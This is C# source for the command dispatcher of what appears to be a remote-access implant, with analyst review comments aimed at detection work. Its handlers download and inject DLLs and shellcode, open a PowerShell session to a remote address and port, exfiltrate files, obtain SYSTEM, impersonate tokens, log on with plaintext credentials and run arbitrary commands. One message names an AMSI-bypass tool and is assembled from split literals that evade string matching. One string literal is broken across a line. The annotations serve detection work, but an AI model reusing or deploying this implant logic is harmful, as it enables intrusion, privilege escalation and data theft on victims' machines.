/// <summary>
/// Starts a new thread that runs <c>ExecuteDllInMemory</c> for an already-loaded assembly
/// and returns without waiting for that thread.
/// </summary>
/// <param name="method">Name passed through to the worker as the first array element.</param>
/// <param name="arguments">Argument strings passed through as the second array element.</param>
/// <param name="dll">The <see cref="Assembly"/> object passed through as the third array element.</param>
/// <remarks>
/// Analysis note: nothing here joins the thread or observes its outcome, so a caller only
/// learns that the thread was started, not that the target method ran or succeeded.
/// </remarks>
public static void Main(string method, string[] arguments, Assembly dll)
{
    // This instance is never referenced again in this method; whether the constructor
    // has side effects cannot be told from here.
    var obj = new LauncherDll();
    var thr1 = new Thread(ExecuteDllInMemory);
    // The three values travel to the worker as a single untyped object[] in this fixed order.
    var a = new object [] { method, arguments, dll };
    thr1.Start(a);
}
/// <summary>
/// Dispatches one received task: <c>file.Commands[0]</c> selects a handler, the remaining
/// elements are that handler's arguments, and the resulting status text is wrapped in a
/// <c>Response</c>, written to a file under <c>_tempPath</c> and handed to <c>TrySend</c>.
/// </summary>
/// <param name="file">Parsed task whose <c>Commands</c> array holds the verb and its arguments.</param>
/// <remarks>
/// Review notes for analysts and detection engineers:
/// - Any first token that is not a known verb falls through to <c>Utils.ExecuteCommand</c>,
///   so the task channel gives whoever controls it arbitrary command execution on the host.
/// - Staged payloads and the response share one location: <c>_tempPath\_id</c> and
///   <c>_tempPath\_id.txt</c>. Whether these files are deleted afterwards is not visible here.
/// - Transfers carry the custom headers <c>reqId</c> and <c>contid</c>; the BITS4 priority
///   constant suggests they run as BITS jobs (confirm in <c>_jobsManager</c>).
/// - Argument indexes are not bounds-checked; a short task raises an exception that the
///   outer catch turns into the generic "ERR: Something went wrong!" reply.
/// </remarks>
private void DoSomething(Content file)
{
    var rps = "";
    try
    {
        switch (file.Commands[0])
        {
            case "inject_dll":
            {
                // Staging path and request headers; the same two lines recur in every
                // handler that pulls a file down through _jobsManager.Get.
                var fileP = _tempPath + @"\" + _id;
                var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;
                if (_jobsManager.Get(_id, fileP, headers, BITS4.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                {
                    try
                    {
                        // The file is written to fileP before LoadDll reads it, so it exists
                        // on disk at least briefly.
                        var dll = LoadDll(fileP);
                        var method = file.Commands[1];
                        var args = "";
                        for (var i = 2; i < file.Commands.Length; i++)
                        {
                            args += file.Commands[i];
                            // This condition repeats the loop condition and is therefore always
                            // true: the joined string always ends with a trailing space.
                            if (i < file.Commands.Length)
                            {
                                args += " ";
                            }
                        }
                        // All arguments are passed on as ONE space-joined string, not one per element.
                        var arguments = new string[] { args };
                        // LauncherDll.Main only starts a thread, so the success text below does
                        // not show that the loaded code actually ran.
                        LauncherDll.Main(method, arguments, dll);
                        rps = "Dll injected!";
                    }
                    catch (Exception)
                    {
                        rps = "ERR:Fatal error occurred while trying to inject the dll.\n";
                    }
                }
                else
                {
                    rps = "ERR:Dll not found!\n";
                }
                break;
            }
            case "inject_shellcode":
            {
                var fileP = _tempPath + @"\" + _id;
                var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;
                // -1 is the value used when no second argument is given; what the launcher does
                // with -1 is not visible here (presumably "no explicit target process" - confirm).
                var pid = -1;
                if (file.Commands.Length >= 2)
                {
                    // A non-numeric argument throws here and is reported by the outer catch.
                    pid = int.Parse(file.Commands[1]);
                }
                if (_jobsManager.Get(_id, fileP, headers, BITS4.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                {
                    byte[] sh;
                    // Runs outside the inner try: a failure here also lands in the outer catch.
                    // The helper's name suggests the staged file is stored encrypted - confirm.
                    GetEncryptedFileContent(fileP, out sh);
                    try
                    {
                        LauncherShellCode.Main(sh, _sysCall, pid);
                        rps = "Shellcode injected!\n";
                    }
                    catch (Exception)
                    {
                        rps = "ERR:Fatal error occurred while trying to inject shellCode.\n";
                    }
                }
                else
                {
                    rps = "ERR:Shellcode file not found!\n";
                }
                break;
            }
            case "powershell":
            {
                // Probe for the PowerShell 2.0 engine. This exact command line is a stable
                // process-creation indicator for this handler.
                rps = Utils.ExecuteCommand("powershell -V 2 /C Write-Host hi");
                // Substring test only: any output containing "hi" counts as success.
                if (rps.Contains("hi"))
                {
                    // Commands[1] and Commands[2] are echoed below as "<1>:<2>", i.e. they look
                    // like an address and a port for the launcher - confirm in LauncherPowershell.
                    LauncherPowershell.Main(file.Commands[1], file.Commands[2]);
                    rps = "You should have your Powershell at " + file.Commands[1] + ":" + file.Commands[2] + "!\n";
                }
                else
                {
                    // NOTE(review): the literal below is split across a raw line break in this
                    // listing, which a regular C# string cannot contain; probably a wrap artifact.
                    // The last word is built from two literals ("am" + "si"), so a static string
                    // search for the whole word will not match this file; match on the fragments.
                    rps = "Version 2 of Powershell not available. 
Try injecting EvilSalsa by CyberVaca in order to use powershell without am" + "si.\n";
                }
                break;
            }
            case "send":
            {
                // "send" is named from the tasking side: a file is pulled down to this host.
                var fileP = _tempPath + @"\" + _id;
                var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;
                if (_jobsManager.Get(_id, fileP, headers, BITS4.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                {
                    // The destination path comes straight from the task and overwrite is enabled,
                    // so an existing file at that path is replaced; the staged copy is left in place.
                    File.Copy(fileP, file.Commands[1], true);
                    rps = "Dowload finished.\n";
                }
                else
                {
                    rps = "ERR:Download failed!\n";
                }
                break;
            }
            case "exfiltrate":
            {
                // Commands[1] is the local file; Commands[2] is passed first to Send
                // (presumably the remote name or destination - confirm in _jobsManager).
                if (File.Exists(file.Commands[1]))
                {
                    if (_jobsManager.Send(file.Commands[2], file.Commands[1]))
                    {
                        rps = "Exfiltration succeed.\n";
                    }
                    else
                    {
                        rps = "ERR:Exfiltration failed!\n";
                    }
                }
                else
                {
                    rps = "ERR:File to exfiltrate not found!\n";
                }
                break;
            }
            case "getsystem":
            {
                // Attempted only when the integrity check passes; both failure paths return
                // the same text, so the reply does not say which step failed.
                if (Utils.IsHighIntegrity(_sysCall))
                {
                    rps = TokenManager.GetSystem() ? "We are System!\n" : "ERR:Process failed! Is this process running with high integrity level?\n";
                }
                else
                {
                    rps = "ERR:Process failed! Is this process running with high integrity level?\n";
                }
                break;
            }
            case "rev2self":
            {
                // The reply is unconditional; no return value from Rev2Self is checked.
                TokenManager.Rev2Self();
                rps = "Welcome back.\n";
                break;
            }
            case "runas":
            {
                string user = "", domain = "", password = "";
                // Accepts "user" or "DOMAIN\user". With no backslash the domain is ".";
                // with more than one backslash only the first two parts are used.
                var userData = file.Commands[1].Split('\\');
                if (userData.Length == 1)
                {
                    domain = ".";
                    user = userData[0];
                }
                else
                {
                    domain = userData[0];
                    user = userData[1];
                }
                // The password arrives as a plain task argument.
                password = file.Commands[2];
                rps = TokenManager.RunAs(domain, user, password) ? "Success!" : "ERR:Invalid credentials.";
                break;
            }
            case "list":
            {
                rps = GetProcessInfo();
                break;
            }
            case "impersonate":
            {
                try
                {
                    // Integer argument, presumably a process id (the "list" verb returns process
                    // info) - confirm in _tokenManager. A parse failure is reported as a failure.
                    if (_tokenManager.Impersonate(int.Parse(file.Commands[1])))
                    {
                        rps = "Impersonation achieved!\n";
                    }
                    else
                    {
                        rps = "ERR: Not enough privileges!\n";
                    }
                }
                catch
                {
                    rps = "ERR: Impersonation failed!\n";
                }
                break;
            }
            case "exit":
            {
                // Terminates the process immediately, so no response is written or sent for this verb.
                Environment.Exit(0);
                break;
            }
            default:
            {
                // Anything that is not a known verb is handed to Utils.ExecuteCommand as-is
                // (presumably run as a shell command, with its output returned - confirm in Utils).
                rps = Utils.ExecuteCommand(file.Commands[0]);
                break;
            }
        }
    }
    catch
    {
        // Catch-all: every unhandled failure above collapses into this one generic reply.
        rps = "ERR: Something went wrong!";
    }
    // Response path: the status text is paired with _auth, written to "<_tempPath>\<_id>.txt"
    // via EncryptResponseIntoFile, and that file is passed to TrySend.
    var response = new Response(rps, _auth);
    var filePath = _tempPath + @"\" + _id + ".txt";
    EncryptResponseIntoFile(filePath, response);
    TrySend(filePath);
}